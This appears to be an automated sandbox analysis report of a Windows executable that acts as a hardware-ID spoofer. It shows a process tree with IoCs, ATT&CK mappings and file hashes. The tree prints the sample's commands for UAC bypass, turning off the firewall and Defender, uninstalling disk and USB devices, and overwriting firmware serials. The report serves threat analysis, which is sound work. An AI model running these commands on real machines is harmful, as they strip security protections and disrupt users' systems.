2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeRestorePrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: 33 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeIncBasePriorityPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: 33 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeIncBasePriorityPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: 33 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeIncBasePriorityPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeRestorePrivilege 3164 sg.tmp Token: 35 3164 sg.tmp Token: SeSecurityPrivilege 3164 sg.tmp Token: SeSecurityPrivilege 3164 sg.tmp Token: SeDebugPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: 33 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeIncBasePriorityPrivilege 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe Token: SeBackupPrivilege 3964 ycyp.exe Token: SeRestorePrivilege 3964 ycyp.exe Token: 33 3964 ycyp.exe Token: SeIncBasePriorityPrivilege 3964 ycyp.exe Token: 33 3964 ycyp.exe Token: SeIncBasePriorityPrivilege 3964 ycyp.exe Token: 33 3964 ycyp.exe Token: SeIncBasePriorityPrivilege 3964 ycyp.exe Token: SeRestorePrivilege 5076 sg.tmp Token: 35 5076 sg.tmp Token: SeSecurityPrivilege 5076 sg.tmp Token: SeSecurityPrivilege 5076 sg.tmp Token: 33 3964 ycyp.exe Token: SeIncBasePriorityPrivilege 3964 ycyp.exe Token: SeDebugPrivilege 1164 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeBackupPrivilege 4828 DevManView.exe Token: SeRestorePrivilege 4828 DevManView.exe Token: SeTakeOwnershipPrivilege 4828 DevManView.exe Token: SeImpersonatePrivilege 4828 DevManView.exe Token: SeBackupPrivilege 1172 DevManView.exe Token: SeRestorePrivilege 1172 DevManView.exe Token: SeTakeOwnershipPrivilege 1172 DevManView.exe Token: SeImpersonatePrivilege 1172 DevManView.exe Token: SeBackupPrivilege 3720 DevManView.exe Token: SeRestorePrivilege 3720 DevManView.exe Token: SeTakeOwnershipPrivilege 3720 DevManView.exe Token: SeImpersonatePrivilege 3720 DevManView.exe Token: SeIncreaseQuotaPrivilege 2896 powershell.exe Token: SeSecurityPrivilege 2896 powershell.exe Token: SeTakeOwnershipPrivilege 2896 powershell.exe Token: SeLoadDriverPrivilege 2896 powershell.exe Token: SeSystemProfilePrivilege 2896 powershell.exe Token: SeSystemtimePrivilege 2896 powershell.exe Token: SeProfSingleProcessPrivilege 2896 powershell.exe Token: SeIncBasePriorityPrivilege 2896 powershell.exe Token: SeCreatePagefilePrivilege 2896 powershell.exe Token: SeBackupPrivilege 2896 powershell.exe Token: SeRestorePrivilege 2896 powershell.exe Token: SeShutdownPrivilege 2896 powershell.exe Token: SeSystemEnvironmentPrivilege 2896 powershell.exe Token: SeRemoteShutdownPrivilege 2896 powershell.exe Token: SeUndockPrivilege 2896 powershell.exe Token: SeManageVolumePrivilege 2896 powershell.exe Token: 33 2896 powershell.exe Token: 34 2896 powershell.exe Token: 35 2896 powershell.exe Token: 36 2896 powershell.exe Token: SeBackupPrivilege 2356 DevManView.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2044 wrote to memory of 2340 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 83 PID 2044 wrote to memory of 2340 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 83 PID 2044 wrote to memory of 3164 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 86 PID 2044 wrote to memory of 3164 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 86 PID 2044 wrote to memory of 3164 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 86 PID 2044 wrote to memory of 4176 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 96 PID 2044 wrote to memory of 4176 2044 3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe 96 PID 4176 wrote to memory of 920 4176 cmd.exe 98 PID 4176 wrote to memory of 920 4176 cmd.exe 98 PID 920 wrote to memory of 2104 920 cmd.exe 100 PID 920 wrote to memory of 2104 920 cmd.exe 100 PID 920 wrote to memory of 400 920 cmd.exe 101 PID 920 wrote to memory of 400 920 cmd.exe 101 PID 920 wrote to memory of 1048 920 cmd.exe 102 PID 920 wrote to memory of 1048 920 cmd.exe 102 PID 920 wrote to memory of 1296 920 cmd.exe 103 PID 920 wrote to memory of 1296 920 cmd.exe 103 PID 920 wrote to memory of 3904 920 cmd.exe 104 PID 920 wrote to memory of 3904 920 cmd.exe 104 PID 3904 wrote to memory of 3160 3904 mshta.exe 105 PID 3904 wrote to memory of 3160 3904 mshta.exe 105 PID 3160 wrote to memory of 4268 3160 cmd.exe 107 PID 3160 wrote to memory of 4268 3160 cmd.exe 107 PID 3160 wrote to memory of 1228 3160 cmd.exe 108 PID 3160 wrote to memory of 1228 3160 cmd.exe 108 PID 3160 wrote to memory of 3244 3160 cmd.exe 109 PID 3160 wrote to memory of 3244 3160 cmd.exe 109 PID 3160 wrote to memory of 2688 3160 cmd.exe 110 PID 3160 wrote to memory of 2688 3160 cmd.exe 110 PID 3160 wrote to memory of 4132 3160 cmd.exe 111 PID 3160 wrote to memory of 4132 3160 cmd.exe 111 PID 4176 wrote to memory of 3600 4176 cmd.exe 112 PID 4176 wrote to memory of 3600 4176 cmd.exe 112 PID 4176 wrote to memory of 1800 4176 cmd.exe 113 PID 4176 wrote to memory of 1800 4176 cmd.exe 113 PID 4176 wrote to memory of 4848 4176 cmd.exe 114 PID 4176 wrote to memory of 4848 4176 cmd.exe 114 PID 4176 wrote to memory of 3140 4176 cmd.exe 115 PID 4176 wrote to memory of 3140 4176 cmd.exe 115 PID 4176 wrote to memory of 1620 4176 cmd.exe 116 PID 4176 wrote to memory of 1620 4176 cmd.exe 116 PID 3160 wrote to memory of 4692 3160 cmd.exe 117 PID 3160 wrote to memory of 4692 3160 cmd.exe 117 PID 4176 wrote to memory of 3964 4176 cmd.exe 118 PID 4176 wrote to memory of 3964 4176 cmd.exe 118 PID 4176 wrote to memory of 3964 4176 cmd.exe 118 PID 3964 wrote to memory of 2700 3964 ycyp.exe 119 PID 3964 wrote to memory of 2700 3964 ycyp.exe 119 PID 3964 wrote to memory of 5076 3964 ycyp.exe 121 PID 3964 wrote to memory of 5076 3964 ycyp.exe 121 PID 3964 wrote to memory of 5076 3964 ycyp.exe 121 PID 3160 wrote to memory of 4792 3160 cmd.exe 123 PID 3160 wrote to memory of 4792 3160 cmd.exe 123 PID 3160 wrote to memory of 2880 3160 cmd.exe 124 PID 3160 wrote to memory of 2880 3160 cmd.exe 124 PID 3160 wrote to memory of 4404 3160 cmd.exe 125 PID 3160 wrote to memory of 4404 3160 cmd.exe 125 PID 3160 wrote to memory of 4976 3160 cmd.exe 126 PID 3160 wrote to memory of 4976 3160 cmd.exe 126 PID 3160 wrote to memory of 1376 3160 cmd.exe 127 PID 3160 wrote to memory of 1376 3160 cmd.exe 127 PID 3160 wrote to memory of 3488 3160 cmd.exe 128 PID 3160 wrote to memory of 3488 3160 cmd.exe 128 PID 3160 wrote to memory of 3228 3160 cmd.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe"C:\Users\Admin\AppData\Local\Temp\3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c set2⤵PID:2340
-
-
C:\Users\Admin\AppData\Local\Temp\~964741791698063893~\sg.tmp7zG_exe x "C:\Users\Admin\AppData\Local\Temp\3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exe" -y -aoa -o"C:\Users\Admin\AppData\Local\Temp\~7521672498616200677"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\king.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K yf.bat3⤵
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\system32\cacls.execacls.exe "C:\System Volume Information"4⤵PID:2104
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F4⤵
- UAC bypass
PID:400
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F4⤵
- UAC bypass
PID:1048
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F4⤵
- UAC bypass
PID:1296
-
-
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c C:\Users\Admin\AppData\Local\Temp\~75216~1\yf.bat ::","","runas",1)(window.close)4⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\~75216~1\yf.bat ::5⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\system32\cacls.execacls.exe "C:\System Volume Information"6⤵PID:4268
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:1228
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2688
-
-
C:\Windows\system32\netsh.exeNetSh Advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4132
-
-
C:\Windows\system32\netsh.exeNetsh Advfirewall show allprofiles6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4692
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD /f6⤵PID:4792
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /d 1 /t REG_DWORD /f6⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /d 1 /t REG_DWORD /f6⤵
- Modifies Windows Defender Real-time Protection settings
PID:4404
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /d 1 /t REG_DWORD /f6⤵
- Modifies Windows Defender Real-time Protection settings
PID:4976
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /d 1 /t REG_DWORD /f6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1376
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /d 4 /t REG_DWORD /f6⤵
- Modifies Security services
PID:3488
-
-
C:\Windows\system32\rundll32.exeRunDll32.exe USER32.DLL,UpdatePerUserSystemParameters6⤵PID:3228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Disable-NetAdapterBinding -Name '╥╘╠½═°' -ComponentID ms_tcpip6"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Disable-NetAdapterBinding -Name 'WLAN' -ComponentID ms_tcpip6"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\system32\pnputil.exepnputil /disable-device "SWD\MSRRAS\MS_NDISWANIP"6⤵PID:3556
-
-
C:\Windows\system32\net.exenet session6⤵PID:2680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session7⤵PID:3656
-
-
-
C:\Windows\system32\reg.exereg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
PID:1296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\AMIDEWINx64.EXEAMIDEWINx64.EXE /SS "Copyright @2025 by [qq214688451] All Rights Reserved 1784"3⤵
- Executes dropped EXE
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\AMIDEWINx64.EXEAMIDEWINx64.EXE /BS "Vx:Lockedyou_Spoofer_yyds_19458"3⤵
- Executes dropped EXE
PID:1800
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\AMIDEWINx64.EXEAMIDEWINx64.EXE /SU AUTO3⤵
- Executes dropped EXE
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\AMIDEWINx64.EXEAMIDEWINx64.EXE /CS "wMDaK3y29703"3⤵
- Executes dropped EXE
PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\AMIDEWINx64.EXEAMIDEWINx64.EXE /PSN Vx:Lockedyou_Spoofer_wMDaK3y3⤵
- Executes dropped EXE
PID:1620
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\ycyp.exeycyp.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c set4⤵PID:2700
-
-
C:\Users\Admin\AppData\Local\Temp\~8134880775663637542~\sg.tmp7zG_exe x "C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\ycyp.exe" -y -aoa -o"C:\Users\Admin\AppData\Local\Temp\~4401787965904539981" -p1233214⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5076
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\SN910.bat" "4⤵PID:2280
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4828
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "Disk drive*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "C:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "D:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "E:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1464
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "F:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "G:\"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "Disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "disk"5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "Disk&*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:1072
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "USBSTOR*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4960
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:952
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "STORAGE*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "DISPLAY*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3960
-
-
C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\DevManView.exeDevManView.exe /uninstall "WAN Miniport*" /use_wildcard""5⤵
- Executes dropped EXE
- Enumerates connected drives
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
C:\Windows\system32\powercfg.exepowercfg -h off5⤵
- Power Settings
PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\~4401787965904539981\js.bat""4⤵PID:2092
-
C:\Windows\system32\powercfg.exepowercfg /h off5⤵
- Power Settings
PID:4316
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM WmiPrvSE.exe5⤵
- Kills process with taskkill
PID:4860
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM WmiPrvSE.exe5⤵
- Kills process with taskkill
PID:3928
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM WmiPrvSE.exe5⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM WmiPrvSE.exe5⤵
- Kills process with taskkill
PID:3488
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im MsSvr.exe /T5⤵
- Kills process with taskkill
PID:4952
-
-
-
C:\Users\Admin\AppData\Local\Temp\~7521672498616200677\ycyp.exePECMD**pecmd-cmd* EXEC -wd:C: -hide cmd /c "C:\Users\Admin\AppData\Local\Temp\~1118547734700175587.cmd"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:896 -
C:\Windows\SYSTEM32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\~1118547734700175587.cmd"5⤵PID:540
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM WmiPrvSE.exe3⤵
- Kills process with taskkill
PID:1668
-
-
-
C:\Users\Admin\AppData\Local\Temp\3e6aed34833aa5354beceaa6b6a3180b831344f3c1d37fd7e3e947f2fdded63c.exePECMD**pecmd-cmd* EXEC -wd:C: -hide cmd /c "C:\Users\Admin\AppData\Local\Temp\~7482061927257159908.cmd"2⤵
- System Location Discovery: System Language Discovery
PID:2640 -
C:\Windows\SYSTEM32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\~7482061927257159908.cmd"3⤵PID:3892
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Power Settings
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD563cdd5b5186f4dcc14de8104e8f2c1f8
SHA10d1bd807a7a55fda5406dde83521f5a42b7a88c3
SHA2563add52de22db3da0ad71319e2927373373afb0c233ca9266cba4338ad132f770
SHA51267a49b77fece77cff4b8b70c011cb8d56da944c04e6fbb89a3e4a330109dc0f1eb0ed8c426b5cba92556aa2338cbcc7952a2cba1f91ae1bc4d13b43163d88852
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
373B
MD5ab17d83b7a4359903a9a084569dcd06d
SHA1d74abb8196c588d89b97890149d7f0c4f1487f98
SHA256b85ea4efe7d27841c6c03827c95fd28c3e05cdcf2f61f7aef53b6c018ad2e42a
SHA51239595531d61c242fd16ab704a994da427496fa789170a9df66a74955d97a98019d12cc91db9a0294aa52436149a87823a5cd3c4ce76b4b4f85a4ebcb9e518b11
-
Filesize
162KB
MD533d7a84f8ef67fd005f37142232ae97e
SHA11f560717d8038221c9b161716affb7cd6b14056e
SHA256a1be60039f125080560edf1eebee5b6d9e2d6039f5f5ac478e6273e05edadb4b
SHA512c059db769b9d8a9f1726709c9ad71e565b8081a879b55d0f906d6927409166e1d5716c784146feba41114a2cf44ee90cf2e0891831245752238f20c41590b3f5
-
Filesize
1KB
MD5d573a5add9a45c45a0385426ebe9120d
SHA1f13629700953b2011219fed7a6880fea739984ef
SHA256f7ef6533d31dce9167f3c619a79ecdce38ed0db55fe3334d83bf6532cf869811
SHA51255e23fc93d43404c79ab171e12cd795d668bfbd5c221c8b93ac3c54e0875eb5579b00b2733dbea6980d3d48530ebee3e41cf93e8751525ed7beecc808902246a
-
Filesize
214B
MD50ad285917aaf3ff326868358c5dac715
SHA1af99c83de82edf0378ef35ab31de811a864f02d4
SHA256cfb38b374a7971d924d90de9eff82b7610ca9fd5ec517ee9705a8fafd5a32cc9
SHA5121a654a104206057b077361e1f0fd6127a9fff00cf33604003a5f4418cc004ab801a9046cacfed505b128f9c3a31fc1596be77f540de13f07a661036e1dc73133
-
Filesize
325B
MD5688bc87e6c7ca2886e106820e5f0a492
SHA1ee4529c6aceaa43b4bb891b1f808cf13131ba161
SHA2562cf05c832fb9d4a08659e93c5bde43539e415390e2b68cd934fb2ebaa0d28bfa
SHA51286879a887f4b7cbfe79a582f0d78b97fec63a20f4ba86911479dcaf9d125706e66456f5503f09b7e742d5556b7d79604dcd3239998e0fbf2a03e91294d3b259b
-
Filesize
373B
MD558bff3176a947e38361e944000c21b74
SHA1308a106f73bc3058091d93cf8d4d8b609f2fa804
SHA2562e2a7a793bc1bb370add1659a966b0f54dc58791e4d3b27a6bc1240275b58b40
SHA5126e17a5c525467adb470813c8e3b8f85ebb6007466dfab8e28fe0a630486189c43264f41276b4e7520de7368e5833e15170626e65e1a445e0319220f72016b2ec
-
Filesize
377KB
MD564ae4aa4904d3b259dda8cc53769064f
SHA124be8fb54afd8182652819b9a307b6f66f3fc58d
SHA2562c67fb6eb81630c917f08295e4ff3b5f777cb41b26f7b09dc36d79f089e61bc4
SHA5126c16d2bc23c20a7456b4db7136e1bb5fcee9cbf83a73d8de507b7b3ffc618f81f020cde638d2cd1ef5f154541b745a2a0e27b4c654683a21571183f7a1bffd16
-
Filesize
28KB
MD50dff47f3b14fb1c1bad47cc517f0581a
SHA1db3538f324f9e52defaba7be1ab991008e43d012
SHA25620f11a64bc4548f4edb47e3d3418da0f6d54a83158224b71662a6292bf45b5fb
SHA512f572e741b5a7e854353420bfe072f4e8d10ea61bd0be06a48f3b07bb58e98987761a4cbd77423bf1ab4a9a79b599b824b6b2951bae9e8ad16bca98c84c72b0a6
-
Filesize
33KB
MD5119f0656ab4bb872f79ee5d421e2b9f9
SHA1e35969966769e7760094cbcffb294d0d04a09db6
SHA25638d87b51f4b69ba2dae1477684a1415f1a3b578eee5e1126673b1beaefee9a20
SHA512428c2a7db1559cb39a882a7dce5a0559efd9d83c2e86ca94bbe3c10c9989fe63c160ab7f475db0400a2ed016ab21f00faa9d0e0b7fdba5e3c34daadab24e71f2
-
Filesize
698B
MD52f6958bd8ba5f635df6114c6f7f6dc65
SHA1fe6250497d6b364b455ee3dd815d7aa515d5047a
SHA25697f4ad0a32d3c9ab0605286ee98ab1c3fc08e975bb4562dd94e180bbc1aefd56
SHA5120dd8f4e4a67f70b38e91a7c26f4f07fbeafe9f7330cb23ab5ce1fa4261955aaa194362d90d7e0e8d1121c18261d466928b8763a2db54130e185eebe4a2725b21
-
Filesize
959KB
MD5181c8c31d173d22a7f43b6871ddce3dd
SHA1cd948c8d48bddf67dbf12af268678aa8ad57dc2e
